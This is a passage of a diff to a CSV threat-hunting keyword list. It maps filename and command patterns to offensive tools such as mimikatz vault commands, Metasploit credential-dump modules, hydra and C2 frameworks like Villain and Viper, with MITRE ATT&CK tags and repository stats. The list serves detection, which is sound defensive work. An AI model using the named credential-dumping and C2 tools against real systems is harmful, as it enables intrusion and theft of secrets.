-"*vault::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*vanhauser-thc/thc-hydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"*vault::*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*vault::cred*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*vault::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
 "*vba-macro-mac-persistence.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z"
 "*VBA-RunPE -*","offensive_tool_keyword","VBA-RunPE","A simple yet effective implementation of the RunPE technique in VBA. This code can be used to run executables from the memory of Word or Excel. It is compatible with both 32 bits and 64 bits versions of Microsoft Office 2010 and above.","T1055 - T1218 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/itm4n/VBA-RunPE","1","0","N/A","N/A","8","777","189","2019-12-17T10:32:43Z","2018-01-28T19:50:44Z"
 "*vba-windows-persistence.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z"
 "*vbs-obfuscator.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
 "*VbulletinWidgetTemplateRce.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
-"*vcenter_forge_saml_token*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*vcenter_secrets_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*vcenter_secrets_dump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*vcenter_forge_saml_token*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*vcenter_secrets_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*vcenter_secrets_dump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*vcsmap*","offensive_tool_keyword","vcsmap","vcsmap is a plugin-based tool to scan public version control systems (currently GitHub and possibly Gitlab soon) for sensitive information like access tokens and credentials.","T1210.001 - T1190 - T1538","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/melvinsh/vcsmap","1","0","N/A","N/A","2","131","25","2021-08-31T20:47:07Z","2016-08-21T11:23:57Z"
-"*vdi2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*vdi2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*vectra-ai-research/MAAD-AF*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
-"*veeam_credential_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*veeam_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*veeam_credential_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*veeam_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*veeam_dump_mssql.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*veeam_dump_postgresql.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*Vegile -*","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","0","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z"
-"*venv wapiti3*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z"
+"*venv wapiti3*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z"
 "*Verified Merlin server *","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
 "*verovaleros/domain_analyzer*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z"
-"*victim_host_generator.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z"
+"*victim_host_generator.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
 "*VID_03EB&PID_2403 *","offensive_tool_keyword","ducky","rubber ducky","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007 - TA0044","N/A","N/A","Hardware","https://github.com/greghanley/ducky-decode-wiki/blob/master/Guide_Change_USB_VID_PID.wiki","1","0","default vid and pid of the device - risk of false positives","10","1","2","0","2015-03-15T02:45:33Z","2015-03-15T02:45:31Z"
 "*VID_0483&PID_5740*","offensive_tool_keyword","FlipperZero","Flipper ZeroFlipper Zero is a portable multi-tool for pentesters and geeks in a toy-like body","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007 - TA0044","N/A","N/A","Hardware","https://docs.flipper.net/qflipper/windows-debug","1","0","default vid and pid of the device - risk of false positives","10","10","N/A","N/A","N/A","N/A"
 "*viewdns-get-rootdomains-ip-ns *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
 "*viewdns-get-rootdomains-whois *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
-"*Villain.git*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
-"*villain.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
-"*Villain/Core*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
-"*villain_core.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
-"*vincent.letoux@gmail.com*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*Villain.git*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*villain.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*Villain/Core*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*villain_core.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*vincent.letoux@gmail.com*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*viper/*.sock*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*viper-dev.conf*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - 
T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*viperpython-dev*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
@@ -18062,76 +18248,76 @@ "*viperzip.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*virajkulkarni14*","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/virajkulkarni14","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Viralmaniar*","offensive_tool_keyword","Github Username","github username hosting post exploitation tools and recon tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Viralmaniar","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*virusscan_bypass.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*virusscan_bypass.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*VirusTotalC2.*","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. 
